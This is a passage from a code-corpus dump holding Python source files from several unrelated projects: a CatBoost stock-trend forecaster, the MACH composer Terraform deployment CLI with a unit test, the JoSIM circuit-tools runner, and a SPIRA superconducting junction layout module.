assert self.ticker.ticker == self.symbol
try:
self.info = self.ticker.info
logging.debug(
f" {self.ticker.ticker} : downloaded {len(self.info)} pairs")
except:
logging.warning(
f"{self.ticker.ticker}: info downloading is broken")
def dump_info_file(self, filename) -> None:
if filename.parent.is_dir() and len(self.info) > 2:
with open(filename, 'w') as d:
d.write(json.dumps(self.info))
logging.debug(f"{self.symbol}: write {len(self.info)} pairs to {filename}")
@property
def info_filename(self):
return self.data_dir / f"{self.infofolder}/{self.symbol}"
def __len__(self):
return len(self.info)
def __str__(self):
return '\n'.join([super(Stockmeta, self).__str__(),
f"{str(self.__class__)} : {self.symbol} : info {len(self.info)} pairs"])
def __call__(self, *args, **kwargs):
super(Stockmeta, self).__call__(*args, **kwargs)
self.update()
```
#### File: tashares/tashares/tashares.py
```python
import datetime
from pathlib import Path
import logging
import pandas as pd
import numpy as np
from catboost import CatBoostRanker, Pool
from tashares.cfg import config
from tashares.wrapper import wrap_stockjobs, load_data, upgrade_targets, compute_metrics
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
class Tashares(object):
"""forecast China A-share trend in next 1,2,5 days.
- Input: file name containing a symbol list.
- Output: predictive price trending of next 1,2,5 days.
Args:
symbol_list (string, optional): the file name of symbol list. Default: 'list_of_interest' under the folder 'data'
task_type (string, optional): China 'ashares' or US 'stocks' according to section names in cfg.ini. Default: 'ashares'
results_to_file (string, optional): the file to save results. Default: '' don't dump results
Examples:
>>> from tashares.tashares import Tashares
>>> tas = Tashares()
>>> tas()
>>> tas = Tashares(symbol_list="/absolute/path/to/list_of_ashares")
>>> tas()
>>> tas = Tashares("/absolute/path/to/list_of_ashares")
>>> tas()
"""
def __init__(self, *args, **kwargs):
self.task_type = kwargs.get('task_type', 'ashares')
self.results_file = kwargs.get('results_to_file', '')
self.data_dir = Path(__file__).parent / 'data/' / self.task_type
self.models_files = config[self.task_type]['ModelList'].split(',')
self.symbol_list = kwargs.get('symbol_list', self.data_dir /
config[self.task_type]['SymbolsOfInterest']) if len(args) == 0 else args[0]
# test purpose
self.dump_data_to = kwargs.get('dump_data_to', self.data_dir / 'forecast.data')
self.load_data_from = kwargs.get('load_data_from', '')
if self.load_data_from != '':
self.forecasting_data = load_data(self.load_data_from, queryid='date')
self.forecasting_data = upgrade_targets(self.forecasting_data)
else:
self.forecasting_data = pd.DataFrame()
def dump_forecast_data(self):
        if not self.forecasting_data.empty:
self.forecasting_data.to_csv(Path(self.dump_data_to), sep='\t', encoding='utf-8',
index=False, float_format='%.6f', header=True, )
def forecast(self):
if self.forecasting_data.empty:
data = wrap_stockjobs(
symbols_file=self.symbol_list,
data_dir=self.data_dir,
update_history=True,
                forecast_only=True,
dump_files=False,
)
self.forecasting_data = data['forecasting']
forecasting_data = self.forecasting_data
if self.task_type == 'ashares':
drop_list = ['symbol', 'date', 'queryid', 'sector', 'industry', 'shortname', 'tag', ] + \
[c for c in forecasting_data.columns if c.lower()[:6] == 'target' or c.lower()[:6] == '_label']
else:
drop_list = ['symbol', 'date', 'queryid', 'sector', 'industry', 'shortname', 'tag', 'adj close'] + \
[c for c in forecasting_data.columns if c.lower()[:6] == 'target' or c.lower()[:6] == '_label']
forecasting_pool = Pool(
data=forecasting_data.drop(drop_list, axis=1).values,
label=forecasting_data['tag'].values,
group_id=forecasting_data['queryid'].values
)
result = pd.DataFrame()
score = np.zeros(len(forecasting_data))
cb = CatBoostRanker()
for model_file in self.models_files:
cb.load_model(self.data_dir / model_file, format="cbm")
prediction = cb.predict(forecasting_pool)
result[Path(model_file).stem] = prediction
score += prediction
# run compute metrics for test case
if self.load_data_from != '':
return compute_metrics(forecasting_data, prediction)
score = score / len(self.models_files)
#forecasting_data.reset_index(drop=False, inplace=True)
result = pd.concat([forecasting_data[['symbol', 'date']], result], axis=1)
result['score'] = score
result = pd.concat([result, forecasting_data['shortname']], axis=1)
result = pd.concat([result, forecasting_data['sector']], axis=1)
result = result.sort_values(['date', 'score'], ascending=False)
result.reset_index(drop=True, inplace=True)
result.insert(0, 'rank', result.index)
# save prediction
if self.results_file != '':
result.to_csv(self.results_file, sep='\t', encoding='utf-8',
index=False, float_format='%.5f')
logging.info(f" today: {datetime.date.today().strftime('%Y-%m-%d')}")
logging.info(f" symbol list: {self.symbol_list}")
logging.info(f"results of {len(result)} ashares saved in {self.results_file}")
# from sendemail import send_mail
# send_mail([f"{self.results_file}", ])
return result
def __call__(self, *args, **kwargs):
return self.forecast()
```
#### File: tashares/tashares/wrapper.py
```python
from concurrent import futures
import multiprocessing
import logging
from pathlib import Path
import pandas as pd
from catboost.utils import eval_metric
from tashares.cfg import config
from tashares.stockjob import Stockjob
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
MAX_WORKERS = max(multiprocessing.cpu_count()-1, 1)
wrapper_parameters = {
'data_dir': '',
'forecast_only': False,
'dump_files': False,
'start_from_date': '2015-01-01',
'max_training_date': '2020-01-01',
'update_history': False,
}
def get_stockjob(symbol):
return Stockjob(symbol=symbol.strip(),
data_dir=wrapper_parameters['data_dir'],
update_history=wrapper_parameters['update_history'],
start_from_date=wrapper_parameters['start_from_date'],
dump_files=wrapper_parameters['dump_files'],
).split_jobs(forecast_only=wrapper_parameters['forecast_only'])
def wrap_stockjobs(symbols_file: str, **kwargs):
'''generate training/test/forecasting data files
- Input: a file of stock symbol list.
- Output: a dictionary of three pandas dataframes for training/test/forecasting data respectively.
Args:
symbols_file (string, required): the file of stock symbol list.
data_dir (string, required): the directory for data files which needs exist already.
        forecast_only (bool, optional): only generate forecasting data if 'forecast_only=True'. Default: False
dump_files (bool, optional): save data into files if 'force_dump=True' and data_dir exists. Default: False
max_training_date (string, optional): the stopping date for training, to control training/test split. Default: '2021-01-01'
stack_features (int, optional): the number of days for stacking in feature engineering. Default: 1
update_history (bool, optional): download the latest history if 'update=True', otherwise use history saved under data_dir. Default: False
forecast_days (int, optional): the day in future for forecasting. Default: 1, i.e. predict tomorrow's
'''
wrapper_parameters.update(kwargs)
logging.debug(f"wrapper_parameters {wrapper_parameters}")
data = {}
with open(symbols_file, encoding='utf8') as f:
job_list = (symbol.strip() for symbol in f)
with futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
to_do: list[futures.Future] = []
for symbol in job_list:
future = executor.submit(get_stockjob, symbol)
to_do.append(future)
logging.debug(f'Scheduled for {symbol}: {future}')
for count, future in enumerate(futures.as_completed(to_do), 1):
res: dict = future.result()
for key, value in res.items():
if key not in data.keys():
data[key] = pd.DataFrame()
if not value.empty:
data[key] = pd.concat([data[key], value], axis=0)
logging.debug(f" {count} futures as completed")
def sort_queryid(df):
if not df.empty:
df = df.sort_values(['date', 'queryid'])
df.reset_index(drop=True, inplace=True)
return df
for key in data.keys():
data[key] = sort_queryid(data[key])
logging.debug(f" {key} samples {len(data[key])}")
return data
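# A minimal usage sketch (hedged: 'symbols.txt' is a hypothetical plain-text file with
# one ticker per line, and '.' stands in for an existing data directory).
def _example_wrap_stockjobs():
    data = wrap_stockjobs(
        "symbols.txt",
        data_dir=".",
        update_history=True,
        forecast_only=False,
        dump_files=False,
    )
    return {name: len(frame) for name, frame in data.items()}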
def dump_stockjobs(task_type, data_dir: Path, **data):
if not data_dir.is_dir():
logging.warning(f"{data_dir} doesn't exist")
else:
for key in data.keys():
filename = data_dir / f"{key}_{task_type}.csv"
if filename.exists():
logging.warning(f"{filename} already exists, skip dumping")
continue
data[key].to_csv(filename, sep='\t', encoding='utf-8', index=False, float_format='%.4f',
header=not filename.exists())
logging.info(f"{key} {len(data[key])} samples saved in {filename}")
def dump_datafiles(symbol_list='', data_dir='', task_type='ashares'):
'''save training/test/forecasting data into files
- Input: a file of stock symbol list.
- Output: three csv files for training/test/forecasting data respectively under the folder data_dir.
Args:
symbol_list (string, optional): the file of stock symbol list. Default: 'SymbolList' in cfg.ini
data_dir (string, optional): the directory to save files. Default: current working directory
'''
if data_dir == '':
data_dir = Path.cwd()
if symbol_list == '':
symbol_list = Path(__file__).parent / 'data/ashares/' / config['ashares']['SymbolList']
data = wrap_stockjobs(
symbol_list,
data_dir=data_dir,
start_from_date=config['DEFAULT']['StartFromDate'],
max_training_date=config['DEFAULT']['MaxTrainingDate'],
        forecast_only=False,
dump_files=False,
update_history=True,)
dump_stockjobs(task_type, Path(data_dir), **data,)
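# A minimal usage sketch (hedged: the output directory is hypothetical and must exist):
#
#   dump_datafiles(data_dir="/tmp/tashares-data")
#
# With the defaults this reads the bundled A-share symbol list and writes
# training_ashares.csv, test_ashares.csv and forecasting_ashares.csv into that directory.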
def load_data(data_file, queryid='date'):
try:
tp = pd.read_csv(data_file, sep='\t', iterator=True, chunksize=10000, dtype={
"date": "category", "symbol": "category", "queryid": "category"})
data = pd.concat(tp, ignore_index=True)
data = data.sort_values([queryid, 'queryid'])
data.reset_index(drop=True, inplace=True)
# encode categorical features
cols = ['date', 'symbol', 'queryid', 'sector', 'industry', 'shortname']
for col in cols:
data[col] = data[col].astype("category").cat.codes + 1
logging.info(f"{data_file} loaded")
except:
logging.critical(f"loading {data_file} failed")
data = pd.DataFrame()
return data
def upgrade_targets(data, forecast_job='1', threshold=10):
if data.empty:
return data
targets = [c for c in data.columns if c.lower()[:6] == 'target']
assert len(targets) > 0
data['target'] = data[f"target_{forecast_job}"]
data['binary_label'] = data['target'].transform(
lambda x: 1 if x >= 0 else 0)
return data
def compute_metrics(labels, y_pred, queryid='date'):
result = [eval_metric(labels['binary_label'], y_pred, 'PrecisionAt:top=5', group_id=labels[queryid]),
eval_metric(labels['binary_label'], y_pred, 'PrecisionAt:top=10', group_id=labels[queryid]),
eval_metric(labels['binary_label'], y_pred, 'PrecisionAt:top=20', group_id=labels[queryid]),
eval_metric(labels['binary_label'], y_pred, 'PrecisionAt:top=50', group_id=labels[queryid]), ]
return result
if __name__ == '__main__':
dump_datafiles()
``` |
{
"source": "joeydebreuk/mach-composer",
"score": 2
} |
#### File: src/mach/build.py
```python
import os.path
import subprocess
import sys
from typing import TYPE_CHECKING, Optional
if TYPE_CHECKING:
from mach.types import LocalArtifact, MachConfig
def build_packages(config: "MachConfig", restrict_components=None):
for component in config.components:
if restrict_components and component.name not in restrict_components:
continue
for artifact, artifact_cfg in component.artifacts.items():
build_artifact(artifact_cfg)
def build_artifact(artifact: "LocalArtifact"):
run_script(artifact.script, artifact.workdir)
if artifact.workdir:
artifact.filename = os.path.abspath(
os.path.join(artifact.workdir, artifact.filename)
)
else:
artifact.filename = os.path.abspath(artifact.filename)
if not os.path.exists(artifact.filename):
raise ValueError(f"The file {artifact.filename} doesn't exist")
def run_script(script: str, workdir: Optional[str]):
p = subprocess.run(
script, stdout=sys.stdout, stderr=sys.stderr, shell=True, cwd=workdir
)
p.check_returncode()
```
#### File: src/mach/commands.py
```python
import glob
import subprocess
import sys
from functools import update_wrapper
from typing import List, Optional
import click
from mach import bootstrap as _bootstrap
from mach import git, parse, updater
from mach.build import build_packages
from mach.exceptions import MachError
from mach.terraform import apply_terraform, generate_terraform, plan_terraform
class Command(click.Command):
def invoke(self, ctx):
try:
return super().invoke(ctx)
except MachError as e:
raise click.ClickException(str(e)) from e
class Group(click.Group):
def command(self, *args, **kwargs):
kwargs.setdefault("cls", Command)
return super().command(*args, **kwargs)
@click.group(cls=Group)
def mach():
pass
def terraform_command(f):
@click.option(
"-f",
"--file",
default=None,
help="YAML file to parse. If not set parse all *.yml files.",
)
@click.option(
"-s",
"--site",
default=None,
help="Site to parse. If not set parse all sites.",
)
@click.option(
"--ignore-version",
is_flag=True,
default=False,
help="Skip MACH composer version check",
)
@click.option(
"--output-path",
default="deployments",
help="Output path, defaults to `cwd`/deployments.",
)
def new_func(file, site, output_path: str, ignore_version: bool, **kwargs):
files = get_input_files(file)
configs = parse.parse_configs(files, output_path, ignore_version=ignore_version)
try:
result = f(
file=file,
site=site,
configs=configs,
**kwargs,
)
except subprocess.CalledProcessError as e:
click.echo("Failed to run")
sys.exit(e.returncode)
else:
click.echo("Done 👍")
return result
return update_wrapper(new_func, f)
@mach.command()
@terraform_command
def generate(file, site, configs, *args, **kwargs):
"""Generate the Terraform files."""
for config in configs:
generate_terraform(config, site=site)
@mach.command()
@click.option(
"--with-sp-login",
is_flag=True,
default=False,
help="If az login with service principal environment variables "
"(ARM_CLIENT_ID, ARM_CLIENT_SECRET, ARM_TENANT_ID) should be done.",
)
@click.option(
"-c",
"--component",
multiple=True,
default=False,
help="",
)
@click.option(
"--reuse",
default=False,
is_flag=True,
help="Supress a terraform init for improved speed (not recommended for production usage)",
)
@terraform_command
def plan(file, site, configs, with_sp_login, component, reuse, *args, **kwargs):
"""Output the deploy plan."""
for config in configs:
generate_terraform(config, site=site)
plan_terraform(
config,
site=site,
components=component,
with_sp_login=with_sp_login,
reuse=reuse,
)
@mach.command()
@click.option(
"--with-sp-login",
is_flag=True,
default=False,
help="If az login with service principal environment variables "
"(ARM_CLIENT_ID, ARM_CLIENT_SECRET, ARM_TENANT_ID) should be done.",
)
@click.option(
"--auto-approve",
is_flag=True,
default=False,
help="",
)
@click.option(
"-c",
"--component",
multiple=True,
default=False,
help="",
)
@click.option(
"--reuse",
is_flag=True,
default=False,
help="Supress a terraform init for improved speed (not recommended for production usage)",
)
@terraform_command
def apply(
file,
site,
configs,
with_sp_login,
auto_approve,
component,
reuse,
*args,
**kwargs,
):
"""Apply the configuration."""
for config in configs:
build_packages(config, restrict_components=component)
generate_terraform(config, site=site)
apply_terraform(
config,
site=site,
components=component,
with_sp_login=with_sp_login,
auto_approve=auto_approve,
reuse=reuse,
)
@mach.command()
@click.option(
"-f",
"--file",
default=None,
help="YAML file to update. If not set update all *.yml files.",
)
@click.option("-v", "--verbose", is_flag=True, default=False, help="Verbose output.")
@click.option(
"--check",
default=False,
is_flag=True,
help="Only checks for updates, doesnt change files.",
)
@click.option(
"-c",
"--commit",
default=False,
is_flag=True,
help="Automatically commits the change.",
)
@click.option(
"-m", "--commit-message", default=None, help="Use a custom message for the commit."
)
@click.argument("component", required=False)
@click.argument("version", required=False)
def update(
file: str,
check: bool,
verbose: bool,
component: str,
version: str,
commit: bool,
commit_message: str,
):
"""Update all (or a given) component.
When no component and version is given, it will check the git repositories for any updates.
This command can also be used to manually update a single component by specifying a component
and version.
"""
if check and commit:
raise click.ClickException(
"check_only is not possible when create_commit is enabled."
)
if component and not version:
if "@" not in component:
raise click.ClickException(
f"When specifying a component ({component}) you should specify a version as well"
)
component, version = component.split("@")
for file in get_input_files(file):
updater.update_file(
file,
component_name=component,
new_version=version,
verbose=verbose,
check_only=check,
)
if commit:
git.add(file)
if commit:
if commit_message:
commit_msg = commit_message
elif component:
commit_msg = f"Updated {component} component"
else:
commit_msg = "Updated components"
git.commit(commit_msg)
@mach.command()
@click.option(
"-f",
"--file",
default=None,
help="YAML file to read. If not set read all *.yml files.",
)
def components(file: str):
"""List all components."""
files = get_input_files(file)
configs = parse.parse_configs(files)
for config in configs:
click.echo(f"{config.file}:")
for component in config.components:
click.echo(f" - {component.name}")
click.echo(f" version: {component.version}")
click.echo("")
@mach.command()
@click.option(
"-f",
"--file",
default=None,
help="YAML file to read. If not set read all *.yml files.",
)
def sites(file: str):
"""List all sites."""
files = get_input_files(file)
configs = parse.parse_configs(files)
for config in configs:
click.echo(f"{config.file}:")
for site in config.sites:
click.echo(f" - {site.identifier}")
click.echo(" components:")
for component in site.components:
click.echo(f" {component.name}")
click.echo("")
@mach.command()
@click.option(
"-o",
"--output",
help="Output file or directory.",
)
@click.option(
"-c",
"--cookiecutter",
default="",
help="cookiecutter repository to generate from.",
)
@click.argument("type_", required=True, type=click.Choice(["config", "component"]))
def bootstrap(output: str, type_: str, cookiecutter: str):
"""Bootstraps a configuration or component."""
if type_ == "config":
_bootstrap.create_configuration(output or "main.yml")
if type_ == "component":
_bootstrap.create_component(output, cookiecutter)
def get_input_files(file: Optional[str]) -> List[str]:
"""Determine input files. If file is not specified use all *.yml files."""
if file:
files = [file]
else:
files = glob.glob("./*.yml")
if not files:
click.echo("No .yml files found")
sys.exit(1)
return files
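# Illustrative invocations of the commands defined above (flags and names are taken
# from the click definitions in this module; file and component names are examples only):
#   mach generate -f main.yml
#   mach plan -s my-site -c my-component
#   mach apply --auto-approve --with-sp-login
#   mach update my-component@1.1 --commit
#   mach components -f main.yml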
```
#### File: src/mach/terraform.py
```python
import os
import re
import subprocess
import sys
from pathlib import Path
from typing import List, Optional, Union
import click
from mach.templates import setup_jinja
from mach.types import MachConfig, Site
def generate_terraform(config: MachConfig, *, site: str = None):
"""Generate Terraform file from template and reformat it."""
env = setup_jinja()
template = env.get_template("site.tf")
sites = _filter_sites(config.sites, site)
for s in sites:
site_dir = config.deployment_path / Path(s.identifier)
site_dir.mkdir(exist_ok=True)
output_file = site_dir / Path("site.tf")
content = _clean_tf(
template.render(
config=config,
general_config=config.general_config,
site=s,
)
)
with open(output_file, "w+") as fh:
fh.write(content)
click.echo(f"Generated file {output_file}")
run_terraform("fmt", cwd=site_dir)
def _clean_tf(content: str) -> str:
"""Clean the Terraform file.
    pyhcl (used in the test suite, for example) doesn't like empty objects that
    contain newlines, so collapse them to a plain "{}".
"""
return re.sub(r"\{(\s*)\}", "{}", content)
def plan_terraform(
config: MachConfig,
*,
site: str = None,
components: List[str] = [],
with_sp_login: bool = False,
reuse=False,
):
"""Terraform init and plan for all generated sites."""
sites = _filter_sites(config.sites, site)
for s in sites:
site_dir = config.deployment_path / Path(s.identifier)
if not site_dir.is_dir():
click.echo(f"Could not find site directory {site_dir}")
continue
click.echo(f"Terraform plan for {site_dir.name}")
if not reuse:
run_terraform("init", site_dir)
if with_sp_login:
azure_sp_login()
cmd = ["plan"]
for component in components:
cmd.append(f"-target=module.{component}")
run_terraform(cmd, site_dir)
def apply_terraform(
config: MachConfig,
*,
site: str = None,
components: List[str] = [],
with_sp_login: bool = False,
auto_approve: bool = False,
reuse=False,
):
"""Terraform apply for all generated sites."""
sites = _filter_sites(config.sites, site)
for s in sites:
site_dir = config.deployment_path / Path(s.identifier)
if not site_dir.is_dir():
click.echo(f"Could not find site directory {site_dir}")
continue
click.echo(f"Applying Terraform for {s.identifier}")
if not reuse:
run_terraform("init", site_dir)
if with_sp_login:
azure_sp_login()
cmd = ["apply"]
if auto_approve:
cmd += ["-auto-approve"]
for component in components:
cmd.append(f"-target=module.{component}")
run_terraform(cmd, site_dir)
def azure_sp_login():
"""Login the service principal with az cli."""
p = subprocess.run(
[
"az",
"login",
"--service-principal",
"-u",
os.environ["ARM_CLIENT_ID"],
"-p",
os.environ["ARM_CLIENT_SECRET"],
"--tenant",
os.environ["ARM_TENANT_ID"],
],
stdout=sys.stdout,
stderr=sys.stderr,
)
p.check_returncode()
def run_terraform(command: Union[List[str], str], cwd):
"""Run any Terraform command."""
if isinstance(command, str):
command = [command]
p = subprocess.run(
["terraform", *command], cwd=cwd, stdout=sys.stdout, stderr=sys.stderr
)
p.check_returncode()
def _filter_sites(sites: List[Site], site_identifier: Optional[str]) -> List[Site]:
if not site_identifier:
return sites
return [s for s in sites if s.identifier == site_identifier]
```
#### File: unittests/types/test_site.py
```python
import pytest
from mach import parse, types
def test_site(config: types.MachConfig):
config.components.append(
types.ComponentConfig(
name="private-api",
source="some-private-source/terraform",
version="1.0",
)
)
config.sites[0].components.append(types.Component(name="private-api"))
config.sites[0].endpoints = [
types.Endpoint(
key="public",
url="api.example.com",
),
types.Endpoint(
key="private",
url="private-api.example.com",
),
]
config = parse.parse_config(config)
site = config.sites[0]
assert site.used_endpoints == []
config.components[0].endpoints = {
"main": "public",
}
config = parse.parse_config(config)
assert site.used_endpoints == [
types.Endpoint(
key="public", url="api.example.com", components=[site.components[0]]
)
]
config.components[1].endpoints = {
"main": "public",
}
config = parse.parse_config(config)
assert site.used_endpoints == [
types.Endpoint(
key="public",
url="api.example.com",
components=[site.components[0], site.components[1]],
)
]
config.components[1].endpoints = {
"main": "private",
}
config = parse.parse_config(config)
assert site.used_endpoints == [
types.Endpoint(
key="public",
url="api.example.com",
components=[
site.components[0],
],
),
types.Endpoint(
key="private",
url="private-api.example.com",
components=[site.components[1]],
),
]
def test_hybrid_endpoints():
endpoints_flat = {
"main": "api.example.com",
"private": "private.example.com",
}
endpoints_complex = {
"main": {
"url": "api.example.com",
},
"private": {
"url": "private.example.com",
},
}
site_schema = types.Site.schema(infer_missing=True)
for input_ in [endpoints_flat, endpoints_complex]:
site = site_schema.load({"identifier": "nl-unittest", "endpoints": input_})
assert site.endpoints == [
types.Endpoint(
key="main",
url="api.example.com",
),
types.Endpoint(
key="private",
url="private.example.com",
),
]
serialized = site_schema.dump(site)
assert serialized["endpoints"] == endpoints_flat
def test_hybrid_endpoints_wrong_value():
with pytest.raises(Exception):
types.Site.schema(infer_missing=True).load(
{"identifier": "nl-unittest", "endpoints": ["bla", "bla"]}
)
``` |
{
"source": "JoeyDelp/josim-tools",
"score": 2
} |
#### File: josim-tools/josim_tools/tools.py
```python
import os
os.system("")
from typing import Any, Tuple, Dict
from multiprocessing import cpu_count
from argparse import ArgumentParser
from toml import load as toml_load
from jsonschema import (
validate as schema_validate,
ValidationError as SchemaValidationError,
)
from . import __version__
from .verify import Verifier
from .analysis import MarginAnalysis, print_margin_analysis_result, YieldAnalysis
from .optimize import Optimizer
from .schema import CONFIG as SCHEMA_CONFIG
from .configuration import (
VerifyConfiguration,
MarginAnalysisConfiguration,
YieldAnalysisConfiguration,
OptimizeConfiguration,
MarginParameterConfiguration,
OptimizerParameterConfiguration,
YieldParameterConfiguration,
)
def run() -> None:
""" Run the tool parsing the commandline arguments """
parser = ArgumentParser(
description="Circuit tools built on JoSIM",
epilog="For further assistance please refer to https://joeydelp.github.io/josim-tools")
parser.add_argument("configuration", type=str, help="configuration.toml file")
parser.add_argument("-v", "--version", action="version", version=f"JoSIM Tools {__version__}")
parser.add_argument("-V","--verbose", action="store_true", default=False, help="enables verbose display of operations")
parser.add_help = True
parser.allow_abbrev = True
args = parser.parse_args()
print(f"JoSIM Tools {__version__}")
if args.verbose:
print("Verbose mode enabled")
configuration = toml_load(args.configuration)
try:
schema_validate(instance=configuration, schema=SCHEMA_CONFIG)
except SchemaValidationError as error:
print("ERROR: configuration file validation failed")
print(" reason: {}".format(error.message))
exit(-1)
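    # The TOML layout this function expects (structure inferred from the lookups below;
    # the exact leaf fields live in the *Configuration dataclasses):
    #   mode = "verify" | "margin" | "yield" | "optimize"
    #   [verify]             used by every mode
    #   [margin]             optional, used by "margin" and "optimize"
    #   [yield]              required by "yield"
    #   [optimize]           required by "optimize"
    #   [parameters.<name>]  per-parameter settings, e.g. nominal = ...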
mode = configuration["mode"]
if mode == "verify":
verify_configuration = VerifyConfiguration.from_dict(configuration["verify"])
verifier = Verifier(verify_configuration)
output = verifier.verify()
if output:
print("SUCCESS")
else:
print("FAILURE")
if output.failure_time is not None:
print(" TIME : {}".format(output.failure_time))
if output.failure_point is not None:
print(" POINT : {}".format(output.failure_point))
elif mode == "margin":
verify_configuration = VerifyConfiguration.from_dict(configuration["verify"])
margin_configuration = MarginAnalysisConfiguration.from_dict(
configuration.get("margin", {})
)
margin_parameters: Dict[str, MarginParameterConfiguration] = {}
for key, item in configuration["parameters"].items():
margin_parameters[key] = MarginParameterConfiguration.from_dict(item)
margin_analysis = MarginAnalysis(verify_configuration, margin_configuration)
num_threads = min(2 * len(margin_parameters), cpu_count())
margin_analysis_parameters: Dict[str, float] = {}
for key, item in margin_parameters.items():
margin_analysis_parameters[key] = item.nominal
result = margin_analysis.analyse(margin_analysis_parameters, num_threads)
print_margin_analysis_result(
result,
left_size=margin_configuration.min_search,
right_size=margin_configuration.max_search,
)
elif mode == "yield":
verify_configuration = VerifyConfiguration.from_dict(configuration["verify"])
yield_configuration = YieldAnalysisConfiguration.from_dict(
configuration["yield"]
)
yield_parameters: Dict[str, YieldParameterConfiguration] = {}
for key, item in configuration["parameters"].items():
yield_parameters[key] = YieldParameterConfiguration.from_dict(item)
num_samples = yield_configuration.num_samples
num_threads = min(num_samples, cpu_count())
yield_analysis = YieldAnalysis(verify_configuration, yield_parameters)
yield_analysis.sample(num_samples, num_threads)
print(
"Yield: {} / {} = {:.1f} %".format(
yield_analysis.num_success(),
yield_analysis.num_total(),
yield_analysis.percentage() * 100,
)
)
elif mode == "optimize":
verify_configuration = VerifyConfiguration.from_dict(configuration["verify"])
margin_configuration = MarginAnalysisConfiguration.from_dict(
configuration.get("margin", {})
)
optimize_configuration = OptimizeConfiguration.from_dict(
configuration["optimize"]
)
optimize_parameters: Dict[str, OptimizerParameterConfiguration] = {}
for key, item in configuration["parameters"].items():
optimize_parameters[key] = OptimizerParameterConfiguration.from_dict(item)
optimizer = Optimizer(
verify_configuration,
margin_configuration,
optimize_configuration,
optimize_parameters,
args.verbose
)
optimization_parameters: Dict[str, float] = {}
for key, item in optimize_parameters.items():
optimization_parameters[key] = item.nominal
point = optimizer.optimize(optimization_parameters)
output_file = optimize_configuration.output
if output_file is not None:
optimizer.margin_analysis_.verifier_.simulator_.write_file_with_updated_parameters(
output_file, point)
else:
assert False, "INTERNAL ERROR: UNREACHABLE CODE"
if __name__ == "__main__":
run()
``` |
{
"source": "JoeyDelp/spira",
"score": 2
} |
#### File: mit/devices/junction_expanded.py
```python
import numpy as np
import spira.all as spira
from spira.yevon.visualization import color
from spira.technologies.mit import devices as dev
from spira.technologies.mit.process.database import RDD
class MetalBlock(spira.Cell):
""" Place a metal layer around the defined contact layers. """
margin = spira.NumberParameter(default=0.0, doc='Margin value between metal layer and nearest contact layers.')
layer = spira.PhysicalLayerParameter(default=RDD.PLAYER.M6, doc='Metal layer to be wrapped around the cell bounding box.')
def create_elements(self, elems):
# cell = spira.Cell(elements=elems.flatten())
cell = spira.Cell(elements=elems)
bb = cell.bbox
margin = self.margin
p1 = [bb[0][0]-margin, bb[0][1]-margin]
p2 = [bb[1][0]+margin, bb[1][1]+margin]
alias = self.layer.layer.name
# alias = '{}_{}'.format(self.layer.layer.name, self.alias)
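        # NOTE: `pc` (the module providing pc.Rectangle) is assumed to be imported
        # elsewhere in the original project; it is not part of the imports shown here.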
elems = pc.Rectangle(alias=alias, layer=self.layer, p1=p1, p2=p2)
return elems
class __Junction__(spira.Cell):
""" Base class for Junction PCell. """
radius = spira.FloatParameter()
width = spira.FloatParameter(doc='Shunt resistance width')
c5r = spira.Parameter(fdef_name='create_c5r')
class I5Contacts(__Junction__):
""" Cell that contains all the vias of the bottom halve of the Junction. """
i5 = spira.Parameter(fdef_name='create_i5')
i6 = spira.Parameter(fdef_name='create_i6')
sky_via = spira.BoolParameter(default=False)
def create_i5(self):
via = dev.ViaI5()
V = spira.SRef(via, midpoint=(0,0))
return V
def create_i6(self):
c = self.i5.midpoint
w = (self.i5.reference.width + 4*RDD.I6.I5_MIN_SURROUND)
via = dev.ViaI6(width=w, height=w)
V = spira.SRef(via, midpoint=c)
return V
def create_c5r(self):
via = dev.ViaC5RA(width=self.width)
V = spira.SRef(via)
V.connect(port=V.ports['R5_e0'], destination=self.i5.ports['M5_e2'])
return V
def create_elements(self, elems):
elems += self.i5
elems += self.c5r
if self.sky_via is True:
elems += self.i6
elems += MetalBlock(layer=RDD.PLAYER.M6).create_elements(elems)
return elems
def create_ports(self, ports):
ports += self.i5.ports['M5_e2']
ports += self.c5r.ports['R5_e2']
return ports
class J5Contacts(__Junction__):
""" Cell that contains all the vias of the top halve of the Junction. """
j5 = spira.Parameter(fdef_name='create_j5')
def create_j5(self):
jj = dev.JJ(width=2*self.radius)
D = spira.SRef(jj, midpoint=(0,0))
return D
def create_c5r(self):
via = dev.ViaC5RA(width=self.width)
V = spira.SRef(via)
V.connect(port=V.ports['R5_e0'], destination=self.j5.ports['M5_e0'])
return V
def create_elements(self, elems):
elems += self.j5
elems += self.c5r
elems += MetalBlock(layer=RDD.PLAYER.M6).create_elements(elems)
return elems
def create_ports(self, ports):
ports += self.j5.ports['M5_e0']
ports += self.c5r.ports['R5_e2']
for p in self.elements['M6'].ports:
ports += p.copy(name=p.name)
return ports
class Junction(spira.Circuit):
__name_prefix__ = 'Junction'
color = spira.ColorParameter(default=color.COLOR_PLUM, doc='The color of the Junction representative node in a graph network (netlist).')
text_type = spira.NumberParameter(default=91)
length = spira.NumberParameter(default=1, doc='Length of the shunt resistance.')
width = spira.NumberParameter(default=RDD.R5.MIN_SIZE, restriction=spira.RestrictRange(lower=RDD.R5.MIN_SIZE, upper=RDD.R5.MAX_WIDTH), doc='Width of the shunt resistance.')
radius = spira.NumberParameter(default=RDD.J5.MIN_SIZE, restriction=spira.RestrictRange(lower=RDD.J5.MIN_SIZE, upper=RDD.J5.MAX_SIZE), doc='Radius of the circular junction layer.')
i5 = spira.Parameter(fdef_name='create_i5_cell')
j5 = spira.Parameter(fdef_name='create_j5_cell')
gnd_via = spira.BoolParameter(default=False)
sky_via = spira.BoolParameter(default=False)
def create_i5_cell(self):
D = I5Contacts(width=self.width, radius=self.radius, sky_via=self.sky_via)
S = spira.SRef(D)
S.move(midpoint=S.ports['R5_e2'], destination=(0, self.length))
return S
def create_j5_cell(self):
D = J5Contacts(width=self.width, radius=self.radius)
S = spira.SRef(D)
S.move(midpoint=S.ports['R5_e2'], destination=(0,0))
return S
def create_elements(self, elems):
R = spira.Route(
port1=self.i5.ports['R5_e2'],
port2=self.j5.ports['R5_e2'],
width=self.width,
layer=RDD.PLAYER.R5
)
elems += spira.SRef(R)
elems += self.i5
elems += self.j5
m5 = MetalBlock(layer=RDD.PLAYER.M5, margin=0.1).create_elements(elems)
elems += m5
if self.gnd_via is True:
i4 = dev.ViaI4()
